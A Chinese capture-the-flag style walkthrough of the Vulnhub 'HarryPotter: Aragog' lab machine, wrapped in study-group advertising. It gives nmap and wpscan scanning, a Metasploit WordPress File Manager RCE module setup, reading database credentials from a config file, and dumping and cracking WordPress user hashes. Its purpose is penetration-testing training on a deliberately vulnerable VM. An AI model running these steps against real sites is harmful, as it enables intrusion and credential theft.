网上学习资料一大堆,但如果学到的知识不成体系,遇到问题时只是浅尝辄止,不再深入研究,那么很难做到真正的技术提升。
一个人可以走的很快,但一群人才能走的更远!不论你是正从事IT行业的老鸟或是对IT行业感兴趣的新人,都欢迎加入我们的的圈子(技术交流、学习资源、职场吐槽、大厂内推、面试辅导),让我们一起学习成长!
Vulnhub靶机介绍:
vulnhub是个提供各种漏洞平台的综合靶场,可供下载多种虚拟机进行下载,本地VM打开即可,像做游戏一样去完成渗透测试、提权、漏洞利用、代码审计等等有趣的实战。
PS:这个是HarryPotter(哈利波特)
系列一共有三个靶机,先来第一个Aragog
老样子需要获得root
权限找到flag
(这里是魂器)即可。
Vulnhub靶机下载:
官网下载:https://download.vulnhub.com/harrypotter/Aragog-1.0.2.ova
Vulnhub靶机安装:
下载好了把安装包解压 然后使用Oracle VM
打开即可。
Vulnhub靶机漏洞详解:
①:信息收集:
kali
里使用arp-scan -l
或者netdiscover
发现主机
渗透机:kali IP :192.168.0.105 靶机IP :192.168.0.103
使用命令:
nmap -sS -sV -A -n -p- 192.168.0.103
发现开启了22
和80
端口,先访问一下哈利波特(经典再现)🆗还是老样子dirb、dirsearch、whatweb、gobuster、nikto
等
这里我们扫到了一堆/blog/
子目录还有后台一看就是WordPress
的cms
的框架🆗 这里可以使用一个工具 wpscan
②:漏洞发现:
WPScan
是一个扫描WordPress
漏洞的黑盒子扫描器,可以扫描出wordpress
的版本,主题,插件,后台用户以及爆破后台用户密码等,Kali Linux
默认自带了WPScan
可以-h
查看具体用法参数
wpscan --api-token=自己的值 --url=http://192.168.0.103/blog -e vp #记得自己注册个账号拿api-token的值 不然扫描不会显示漏洞信息的
其实就有关于file Manager
的 我们可以使用MSF
去测试一下
③:漏洞利用:
search wordpress file manager #搜索manager相关漏洞信息
use exploit/multi/http/wp_file_manager_rce #使用模块
show options #查看需要的设置的参数
set RHOST 192.168.0.103 #设置靶机ip
set LHOST 192.168.0.105 #设置本地ip
set payload #可以设置 可以不设
set TARGETURI /blog
run #运行即可
🆗这里就渗透进来了,在/home
下面的 hagrid98
文件下发现第一个魂器base64
解码即可。
④:数据库语句查询:
🆗这里我们找到了第一个魂器 使用 getuid
发现权限比较低 这里我们的思路就是需要提权操作了!
思路:wordpress
用户会在mysql
数据库中存储信息,在/etc/wordpress
里可以打开config-default.php
得到账号和密码:root/mySecr3tPass
python3 -c 'import pty; pty.spawn("bin.bash");' #开启交互
mysql -u root -p #登入数据库
show databases; #列出库
use wordpress; #使用wordpress库
show tables; #查询表
select * from wp_users; #查询表内容
然后MD5解码得到密码:password123
既有适合小白学习的零基础资料,也有适合3年以上经验的小伙伴深入学习提升的进阶课程,涵盖了95%以上软件测试知识点,真正体系化!
由于文件比较多,这里只是将部分目录截图出来,全套包含大厂面经、学习笔记、源码讲义、实战项目、大纲路线、讲解视频,并且后续会持续更新
点,真正体系化!**
由于文件比较多,这里只是将部分目录截图出来,全套包含大厂面经、学习笔记、源码讲义、实战项目、大纲路线、讲解视频,并且后续会持续更新